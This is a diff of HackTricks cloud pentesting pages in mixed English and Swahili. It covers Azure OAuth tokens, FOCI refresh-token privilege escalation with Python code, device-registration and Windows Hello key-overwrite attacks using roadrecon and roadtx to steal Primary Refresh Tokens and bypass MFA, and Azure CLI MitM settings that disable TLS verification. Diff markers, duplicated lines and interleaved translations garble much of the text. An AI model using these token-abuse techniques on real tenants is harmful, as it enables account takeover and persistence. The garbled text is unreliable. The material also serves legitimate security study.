4. **Authorization Server (AS):** Issues access tokens to client applications after authenticating and authorizing them.
1. **Seva ya Rasilimali (RS):** Inalinda rasilimali zinazomilikiwa na mmiliki wa rasilimali.
2. **Mmiliki wa Rasilimali (RO):** Kawaida ni mtumiaji wa mwisho anaye miliki rasilimali zilizolindwa.
3. **Programu ya Mteja (CA):** Programu inayotafuta ufikiaji wa rasilimali kwa niaba ya mmiliki wa rasilimali.
4. **Seva ya Uidhinishaji (AS):** Inatoa alama za ufikiaji kwa programu za mteja baada ya kuthibitisha na kuidhinisha.
**Scopes and Consent:**
**Mikondo na Idhini:**
- **Scopes:** Granular permissions defined on the resource server that specify access levels.
- **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes.
- **Mikondo:** Ruhusa za kina zilizofafanuliwa kwenye seva ya rasilimali zinazobainisha viwango vya ufikiaji.
- **Idhini:** Mchakato ambao mmiliki wa rasilimali anatoa ruhusa kwa programu ya mteja kufikia rasilimali zenye mikondo maalum.
**Microsoft 365 Integration:**
**Ushirikiano wa Microsoft 365:**
- Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications.
- These applications are deeply integrated and often have interdependent service relationships.
- To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications.
- **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l.
- These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces.
- Microsoft 365 inatumia Azure AD kwa IAM na inajumuisha programu nyingi za "first-party" za OAuth.
- Programu hizi zimeunganishwa kwa kina na mara nyingi zina uhusiano wa huduma zinazohusiana.
- Ili kurahisisha uzoefu wa mtumiaji na kudumisha kazi, Microsoft inatoa "idhini iliyodhaniwa" au "idhini ya awali" kwa programu hizi za first-party.
- **Idhini Iliyodhaniwa:** Programu fulani zinapewa moja kwa moja **ufikiaji wa mikondo maalum bila idhini wazi ya mtumiaji au msimamizi**.
- Mikondo hii ya awali kwa kawaida inafichwa kutoka kwa watumiaji na wasimamizi, na kuifanya iwe na mwonekano mdogo katika interfaces za usimamizi wa kawaida.
**Client Application Types:**
**Aina za Programu za Mteja:**
1. **Confidential Clients:**
- Possess their own credentials (e.g., passwords or certificates).
- Can **securely authenticate themselves** to the authorization server.
2. **Public Clients:**
- Do not have unique credentials.
- Cannot securely authenticate to the authorization server.
- **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application.
1. **Wateja wa Siri:**
- Wana akidi zao wenyewe (mfano, nywila au vyeti).
- Wanaweza **kujithibitisha kwa usalama** kwa seva ya uidhinishaji.
2. **Wateja wa Umma:**
- Hawana akidi za kipekee.
- Hawawezi kujithibitisha kwa usalama kwa seva ya uidhinishaji.
- **Athari za Usalama:** Mshambuliaji anaweza kujifanya kuwa programu ya mteja wa umma anapohitaji alama, kwani hakuna mekanismu kwa seva ya uidhinishaji kuthibitisha uhalali wa programu.
## Authentication Tokens
There are **three types of tokens** used in OIDC:
Kuna **aina tatu za alama** zinazotumika katika OIDC:
- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default.
- **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**.
- **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens).
- A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**.
- A refresh token is encrypted and only Microsoft can decrypt it.
- Getting a new refresh token doesn't revoke the previous refresh token.
- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** Mteja anawasilisha alama hii kwa seva ya rasilimali ili **kufikia rasilimali**. Inaweza kutumika tu kwa mchanganyiko maalum wa mtumiaji, mteja, na rasilimali na **haiwezi kufutwa** hadi ipite muda - yaani, saa 1 kwa kawaida.
- **ID Tokens**: Mteja anapata alama hii **kutoka kwa seva ya uidhinishaji**. Inajumuisha taarifa za msingi kuhusu mtumiaji. Inafungwa kwa mchanganyiko maalum wa mtumiaji na mteja.
- **Refresh Tokens**: Zinapeanwa kwa mteja pamoja na alama ya ufikiaji. Zinatumika **kupata alama mpya za ufikiaji na ID**. Inafungwa kwa mchanganyiko maalum wa mtumiaji na mteja na inaweza kufutwa. Muda wa kawaida wa kuisha ni **siku 90** kwa alama za refresha zisizofanya kazi na **hakuna muda wa kuisha kwa alama za kazi** (kutoka kwa alama ya refresha inawezekana kupata alama mpya za refresha).
- Alama ya refresha inapaswa kuunganishwa na **`aud`**, kwa baadhi ya **mikondo**, na kwa **tenant** na inapaswa kuwa na uwezo wa kuzalisha alama za ufikiaji kwa ajili ya aud hiyo, mikondo (na hakuna zaidi) na tenant. Hata hivyo, hii si hali kwa **alama za programu za FOCI**.
- Alama ya refresha imefichwa na ni Microsoft pekee inayoweza kuifungua.
- Kupata alama mpya ya refresha hakufuti alama ya refresha ya awali.
> [!WARNING]
> Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**.
> Taarifa za **ufikiaji wa masharti** zime **hifadhiwa** ndani ya **JWT**. Hivyo, ikiwa unahitaji **alama kutoka kwa anwani ya IP iliyoidhinishwa**, hiyo **IP** itakuwa **hifadhiwa** katika alama na kisha unaweza kutumia alama hiyo kutoka kwa **IP isiyoidhinishwa kufikia rasilimali**.
### Access Tokens "aud"
The field indicated in the "aud" field is the **resource server** (the application) used to perform the login.
Uwanja ulioonyeshwa katika uwanja wa "aud" ni **seva ya rasilimali** (programu) inayotumika kufanya kuingia.
The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token:
Amri `az account get-access-token --resource-type [...]` inasaidia aina zifuatazo na kila moja itongeza "aud" maalum katika alama ya ufikiaji inayotokana:
> [!CAUTION]
> Note that the following are just the APIs supported by `az account get-access-token` but there are more.
> Kumbuka kwamba yafuatayo ni APIs zinazosaidiwa na `az account get-access-token` lakini kuna zaidi.
<details>
<summary>aud examples</summary>
<summary>mfano wa aud</summary>
- **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD).
- `https://graph.windows.net/`
- **aad-graph (Azure Active Directory Graph API)**: Inatumika kufikia API ya zamani ya Azure AD Graph (iliyotengwa), ambayo inaruhusu programu kusoma na kuandika data ya directory katika Azure Active Directory (Azure AD).
- `https://graph.windows.net/`
* **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more.
- `https://management.core.windows.net/ or https://management.azure.com/`
* **arm (Azure Resource Manager)**: Inatumika kusimamia rasilimali za Azure kupitia API ya Azure Resource Manager. Hii inajumuisha operesheni kama kuunda, kuboresha, na kufuta rasilimali kama vile mashine za virtual, akaunti za hifadhi, na zaidi.
- `https://management.core.windows.net/ or https://management.azure.com/`
- **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud.
- `https://batch.core.windows.net/`
- **batch (Azure Batch Services)**: Inatumika kufikia Azure Batch, huduma inayowezesha programu za kompyuta za kiwango kikubwa na za utendaji wa juu kwa ufanisi katika wingu.
- `https://batch.core.windows.net/`
* **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service.
- `https://datalake.azure.net/`
* **data-lake (Azure Data Lake Storage)**: Inatumika kuingiliana na Azure Data Lake Storage Gen1, ambayo ni huduma ya hifadhi ya data na uchambuzi inayoweza kupanuka.
- `https://datalake.azure.net/`
- **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content.
- `https://rest.media.azure.net`
- **media (Azure Media Services)**: Inatumika kufikia Azure Media Services, ambayo inatoa huduma za usindikaji na usambazaji wa media zinazotegemea wingu kwa maudhui ya video na sauti.
- `https://rest.media.azure.net`
* **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services.
- `https://graph.microsoft.com`
* **ms-graph (Microsoft Graph API)**: Inatumika kufikia Microsoft Graph API, kiunganishi kilichounganishwa kwa data za huduma za Microsoft 365. Inaruhusu kufikia data na maarifa kutoka kwa huduma kama Azure AD, Office 365, Enterprise Mobility, na huduma za Usalama.
- `https://graph.microsoft.com`
- **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB.
- `https://ossrdbms-aad.database.windows.net`
- **oss-rdbms (Azure Open Source Relational Databases)**: Inatumika kufikia huduma za Azure Database kwa injini za hifadhidata za uhusiano za chanzo wazi kama MySQL, PostgreSQL, na MariaDB.
- `https://ossrdbms-aad.database.windows.net`
</details>
### Access Tokens Scopes "scp"
The scope of an access token is stored inside the scp key inside the access token JWT. These scopes define what the access token has access to.
Mikondo ya alama ya ufikiaji inahifadhiwa ndani ya ufunguo wa scp ndani ya alama ya ufikiaji JWT. Mikondo hii inafafanua kile alama ya ufikiaji ina ufikiaji.
If a JWT is allowed to contact an specific API but **doesn't have the scope** to perform the requested action, it **won't be able to perform the action** with that JWT.
Ikiwa JWT inaruhusiwa kuwasiliana na API maalum lakini **haina mikondo** ya kufanya kitendo kilichohitajika, haitakuwa na uwezo wa kufanya kitendo hicho na JWT hiyo.
### Get refresh & access token example
```python
# Code example from https://github.com/secureworks/family-of-client-ids-research
import msal
@@ -107,17 +106,17 @@ from typing import Any, Dict, List
# LOGIN VIA CODE FLOW AUTHENTICATION
azure_cli_client = msal.PublicClientApplication(
"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
)
device_flow = azure_cli_client.initiate_device_flow(
scopes=["https://graph.microsoft.com/.default"]
scopes=["https://graph.microsoft.com/.default"]
)
print(device_flow["message"])
# Perform device code flow authentication
azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow(
device_flow
device_flow
)
pprint(azure_cli_bearer_tokens_for_graph_api)
@@ -125,83 +124,74 @@ pprint(azure_cli_bearer_tokens_for_graph_api)
# DECODE JWT
def decode_jwt(base64_blob: str) -> Dict[str, Any]:
"""Decodes base64 encoded JWT blob"""
return jwt.decode(
base64_blob, options={"verify_signature": False, "verify_aud": False}
)
"""Decodes base64 encoded JWT blob"""
return jwt.decode(
base64_blob, options={"verify_signature": False, "verify_aud": False}
)
decoded_access_token = decode_jwt(
azure_cli_bearer_tokens_for_graph_api.get("access_token")
azure_cli_bearer_tokens_for_graph_api.get("access_token")
)
pprint(decoded_access_token)
# GET NEW ACCESS TOKEN AND REFRESH TOKEN
new_azure_cli_bearer_tokens_for_graph_api = (
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
# Same scopes as original authorization
scopes=["https://graph.microsoft.com/.default"],
)
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
# Same scopes as original authorization
scopes=["https://graph.microsoft.com/.default"],
)
)
pprint(new_azure_cli_bearer_tokens_for_graph_api)
```
## FOCI Tokens Privilege Escalation
Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the **application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended.
Kabla ilisemwa kwamba refresh tokens zinapaswa kuunganishwa na **scopes** ambazo zilitengenezwa nazo, kwa **application** na **tenant** ambazo zilitengenezwa kwao. Ikiwa mojawapo ya mipaka hii itavunjwa, inawezekana kupandisha mamlaka kwani itakuwa inawezekana kutengeneza access tokens kwa rasilimali nyingine na tenants ambazo mtumiaji anaweza kufikia na kwa scopes zaidi kuliko ilivyokusudiwa awali.
Moreover, **this is possible with all refresh tokens** in the [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, and social accounts like Facebook and Google) because as the [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) mention: "Refresh tokens are bound to a combination of user and client, but **aren't tied to a resource or tenant**. A client can use a refresh token to acquire access tokens **across any combination of resource and tenant** where it has permission to do so. Refresh tokens are encrypted and only the Microsoft identity platform can read them."
Zaidi ya hayo, **hii inawezekana na refresh tokens zote** katika [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, na akaunti za kijamii kama Facebook na Google) kwa sababu kama [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) zinavyosema: "Refresh tokens zimefungwa kwa mchanganyiko wa mtumiaji na mteja, lakini **hazifungwi kwa rasilimali au tenant**. Mteja anaweza kutumia refresh token kupata access tokens **katika mchanganyiko wowote wa rasilimali na tenant** ambapo ana ruhusa kufanya hivyo. Refresh tokens zimefungwa na ni Microsoft identity platform pekee inayoweza kuzisoma."
Moreover, note that the FOCI applications are public applications, so **no secret is needed** to authenticate to the server.
Zaidi ya hayo, kumbuka kwamba FOCI applications ni public applications, hivyo **siri yoyote haitahitajika** kuthibitisha kwenye seva.
Then known FOCI clients reported in the [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) can be [**found here**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
Kisha wateja wa FOCI waliotambulika waliripotiwa katika [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) wanaweza [**kupatikana hapa**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
### Get different scope
Following with the previous example code, in this code it's requested a new token for a different scope:
Kufuata mfano wa awali wa msimbo, katika msimbo huu inahitajika token mpya kwa scope tofauti:
```python
# Code from https://github.com/secureworks/family-of-client-ids-research
azure_cli_bearer_tokens_for_outlook_api = (
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
new_azure_cli_bearer_tokens_for_graph_api.get(
"refresh_token"
),
# But different scopes than original authorization
scopes=[
"https://outlook.office.com/.default"
],
)
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
new_azure_cli_bearer_tokens_for_graph_api.get(
"refresh_token"
),
# But different scopes than original authorization
scopes=[
"https://outlook.office.com/.default"
],
)
)
pprint(azure_cli_bearer_tokens_for_outlook_api)
```
### Get different client and scopes
### Pata wateja na mipaka tofauti
```python
# Code from https://github.com/secureworks/family-of-client-ids-research
microsoft_office_client = msal.PublicClientApplication("d3590ed6-52b3-4102-aeff-aad2292ab01c")
microsoft_office_bearer_tokens_for_graph_api = (
# This is a different client application than we used in the previous examples
microsoft_office_client.acquire_token_by_refresh_token(
# But we can use the refresh token issued to our original client application
azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
# And request different scopes too
scopes=["https://graph.microsoft.com/.default"],
)
# This is a different client application than we used in the previous examples
microsoft_office_client.acquire_token_by_refresh_token(
# But we can use the refresh token issued to our original client application
azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
# And request different scopes too
scopes=["https://graph.microsoft.com/.default"],
)
)
# How is this possible?
pprint(microsoft_office_bearer_tokens_for_graph_api)
```
## References
## Marejeleo
- [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research)
{{#include ../../../banners/hacktricks-training.md}}

68
src/pentesting-cloud/azure-security/az-device-registration.md
View File

@@ -4,41 +4,38 @@
## Basic Information
When a device joins AzureAD a new object is created in AzureAD.
Wakati kifaa kinajiunga na AzureAD, kitu kipya kinaundwa katika AzureAD.
When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt.
Wakati wa kujiandikisha kifaa, **mtumiaji anaombwa kuingia na akaunti yake** (akiulizwa kwa MFA ikiwa inahitajika), kisha inahitaji tokeni za huduma ya usajili wa kifaa na kisha inauliza uthibitisho wa mwisho.
Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible.
Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).:
Kisha, jozi mbili za funguo za RSA zinaundwa katika kifaa: **funguo ya kifaa** (**funguo ya umma**) ambayo inatumwa kwa **AzureAD** na **funguo ya usafirishaji** (**funguo ya faragha**) ambayo inahifadhiwa katika TPM ikiwa inawezekana.
Kisha, **kitu** kinaundwa katika **AzureAD** (sio katika Intune) na AzureAD inarudisha kwa kifaa **cheti** kilichosainiwa na hiyo. Unaweza kuthibitisha kwamba **kifaa kimejiunga na AzureAD** na taarifa kuhusu **cheti** (kama kimeprotected na TPM).
```bash
dsregcmd /status
```
Baada ya usajili wa kifaa, **Primary Refresh Token** inahitajika na moduli ya LSASS CloudAP na inatolewa kwa kifaa. PRT inakuja na **funguo ya kikao iliyosimbwa ili kifaa pekee kiweze kuisambua** (kwa kutumia funguo ya umma ya funguo ya usafirishaji) na **inahitajika ili kutumia PRT.**
After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.**
For more information about what is a PRT check:
Kwa maelezo zaidi kuhusu nini PRT ni angalia:
{{#ref}}
az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
{{#endref}}
### TPM - Trusted Platform Module
### TPM - Moduli ya Jukwaa Iliyotegemewa
The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\
But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights.
**TPM** **inalinda** dhidi ya **uchimbaji** wa funguo kutoka kwa kifaa kilichozimwa (ikiwa kinalindwa na PIN) na kutoka kwa uchimbaji wa nyenzo za faragha kutoka kwenye safu ya OS.\
Lakini **haiwezi kulinda** dhidi ya **kuvuta** muunganisho wa kimwili kati ya TPM na CPU au **kutumia nyenzo za kifahari** katika TPM wakati mfumo unafanya kazi kutoka kwa mchakato wenye haki za **SYSTEM**.
If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys):
Ikiwa utaangalia ukurasa ufuatao utaona kwamba **kuiba PRT** kunaweza kutumika kupata kama **mtumiaji**, ambayo ni nzuri kwa sababu **PRT iko kwenye vifaa**, hivyo inaweza kuibiwa kutoka kwao (au ikiwa haijaibiwa inaweza kutumika vibaya kuunda funguo mpya za kusaini):
{{#ref}}
az-lateral-movement-cloud-on-prem/pass-the-prt.md
{{#endref}}
## Registering a device with SSO tokens
It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it:
## Kusajili kifaa na tokeni za SSO
Itakuwa inawezekana kwa mshambuliaji kuomba tokeni kwa huduma ya usajili wa kifaa ya Microsoft kutoka kwa kifaa kilichovunjwa na kukisajili:
```bash
# Initialize SSO flow
roadrecon auth prt-init
@@ -50,49 +47,46 @@ roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie <cookie>
# Custom pyhton script to register a device (check roadtx)
registerdevice.py
```
Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**.
Which will give you a **cheti ambacho unaweza kutumia kuomba PRTs katika siku zijazo**. Hivyo kudumisha kudumu na **kuzidi MFA** kwa sababu token ya PRT ya awali iliyotumika kujiandikisha kifaa kipya **ilikuwa tayari na ruhusa za MFA zilizotolewa**.
> [!TIP]
> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**.
> Kumbuka kwamba ili kufanya shambulio hili utahitaji ruhusa za **kujiandikisha vifaa vipya**. Pia, kujiandikisha kifaa hakumaanishi kifaa kitakuwa **kimekubaliwa kujiunga na Intune**.
> [!CAUTION]
> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
> Shambulio hili lilirekebishwa mnamo Septemba 2021 kwani huwezi tena kujiandikisha vifaa vipya kwa kutumia token za SSO. Hata hivyo, bado inawezekana kujiandikisha vifaa kwa njia halali (ikiwa na jina la mtumiaji, nenosiri na MFA ikiwa inahitajika). Angalia: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
## Overwriting a device ticket
## Kuandika upya tiketi ya kifaa
It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A).
Ilikuwa inawezekana **kuomba tiketi ya kifaa**, **kuandika upya** ile ya sasa ya kifaa, na wakati wa mchakato **kuiiba PRT** (hivyo hakuna haja ya kuiba kutoka kwa TPM. Kwa maelezo zaidi [**angalia mazungumzo haya**](https://youtu.be/BduCn8cLV1A).
<figure><img src="../../images/image (32).png" alt=""><figcaption></figcaption></figure>
> [!CAUTION]
> However, this was fixed.
> Hata hivyo, hili lilirekebishwa.
## Overwrite WHFB key
## Andika upya funguo za WHFB
[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
[**Angalia slaidi za asili hapa**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
Attack summary:
Muhtasari wa shambulio:
- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO
- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key
- This also provides **persistence**
- Inawezekana **kuandika upya** funguo za **WHFB** zilizoregistriwa kutoka kwa **kifaa** kupitia SSO
- In **shinda ulinzi wa TPM** kwani funguo inachukuliwa **wakati wa uzalishaji** wa funguo mpya
- Hii pia inatoa **kudumu**
<figure><img src="../../images/image (34).png" alt=""><figcaption></figcaption></figure>
Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph.
Then, it's possible to generate a new key with:
Watumiaji wanaweza kubadilisha mali yao ya searchableDeviceKey kupitia Azure AD Graph, hata hivyo, mshambuliaji anahitaji kuwa na kifaa katika mpangilio (kilichoregistriwa kwa haraka au akiwa na cheti + funguo iliyopatikana kutoka kwa kifaa halali) na token ya ufikiaji halali kwa AAD Graph.
Kisha, inawezekana kuzalisha funguo mpya na:
```bash
roadtx genhellokey -d <device id> -k tempkey.key
```
and then PATCH the information of the searchableDeviceKey:
na kisha PATCH taarifa za searchableDeviceKey:
<figure><img src="../../images/image (36).png" alt=""><figcaption></figcaption></figure>
It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check:
Inawezekana kupata token ya ufikiaji kutoka kwa mtumiaji kupitia **device code phishing** na kutumia hatua zilizopita ili **kuiba ufikiaji wake**. Kwa maelezo zaidi angalia:
{{#ref}}
az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
@@ -100,14 +94,10 @@ az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-en
<figure><img src="../../images/image (37).png" alt=""><figcaption></figcaption></figure>
## References
## Marejeo
- [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A)
- [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
- [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY)
{{#include ../../banners/hacktricks-training.md}}

68
src/pentesting-cloud/azure-security/az-enumeration-tools.md
View File

@@ -5,7 +5,7 @@
## Install PowerShell in Linux
> [!TIP]
> In linux you will need to install PowerShell Core:
> Katika linux utahitaji kufunga PowerShell Core:
>
> ```bash
> sudo apt-get update
@@ -28,56 +28,45 @@
## Install PowerShell in MacOS
Instructions from the [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
1. Install `brew` if not installed yet:
Maelekezo kutoka [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
1. Funga `brew` ikiwa haijafungwa bado:
```bash
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
```
2. Install the latest stable release of PowerShell:
2. Sakinisha toleo la hivi punde la PowerShell:
```sh
brew install powershell/tap/powershell
```
3. Run PowerShell:
3. Kimbia PowerShell:
```sh
pwsh
```
4. Update:
4. Sasisho:
```sh
brew update
brew upgrade powershell
```
## Main Enumeration Tools
### az cli
[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is a cross-platform tool written in Python for managing and administering (most) Azure and Entra ID resources. It connects to Azure and executes administrative commands via the command line or scripts.
[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) ni chombo cha kuvuka majukwaa kilichoandikwa kwa Python kwa ajili ya kusimamia na kuendesha (zaidi ya) rasilimali za Azure na Entra ID. Kinajihusisha na Azure na kutekeleza amri za usimamizi kupitia mstari wa amri au skripti.
Follow this link for the [**installation instructions¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
Commands in Azure CLI are structured using a pattern of: `az <service> <action> <parameters>`
Amri katika Azure CLI zimejengwa kwa kutumia muundo wa: `az <service> <action> <parameters>`
#### Debug | MitM az cli
Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
Kwa kutumia parameter **`--debug`** inawezekana kuona maombi yote ambayo chombo **`az`** kinatuma:
```bash
az account management-group list --output table --debug
```
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikono unaweza kufanya:
{{#tabs }}
{{#tab name="Bash" }}
```bash
export ADAL_PYTHON_SSL_NO_VERIFY=1
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
@@ -90,64 +79,53 @@ export HTTP_PROXY="http://127.0.0.1:8080"
openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
```
{{#endtab }}
{{#tab name="PS" }}
```bash
$env:ADAL_PYTHON_SSL_NO_VERIFY=1
$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
$env:HTTPS_PROXY="http://127.0.0.1:8080"
$env:HTTP_PROXY="http://127.0.0.1:8080"
```
{{#endtab }}
{{#endtabs }}
### Az PowerShell
Azure PowerShell is a module with cmdlets for managing Azure resources directly from the PowerShell command line.
Azure PowerShell ni moduli yenye cmdlets za kusimamia rasilimali za Azure moja kwa moja kutoka kwenye mstari wa amri wa PowerShell.
Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
Commands in Azure PowerShell AZ Module are structured like: `<Action>-Az<Service> <parameters>`
Amri katika Moduli ya Azure PowerShell AZ zimeundwa kama: `<Action>-Az<Service> <parameters>`
#### Debug | MitM Az PowerShell
Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
Kwa kutumia parameter **`-Debug`** inawezekana kuona maombi yote ambayo chombo kinatuma:
```bash
Get-AzResourceGroup -Debug
```
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can set the env variables `HTTPS_PROXY` and `HTTP_PROXY` according to the [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikono unaweza kuweka mabadiliko ya mazingira `HTTPS_PROXY` na `HTTP_PROXY` kulingana na [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
### Microsoft Graph PowerShell
Microsoft Graph PowerShell is a cross-platform SDK that enables access to all Microsoft Graph APIs, including services like SharePoint, Exchange, and Outlook, using a single endpoint. It supports PowerShell 7+, modern authentication via MSAL, external identities, and advanced queries. With a focus on least privilege access, it ensures secure operations and receives regular updates to align with the latest Microsoft Graph API features.
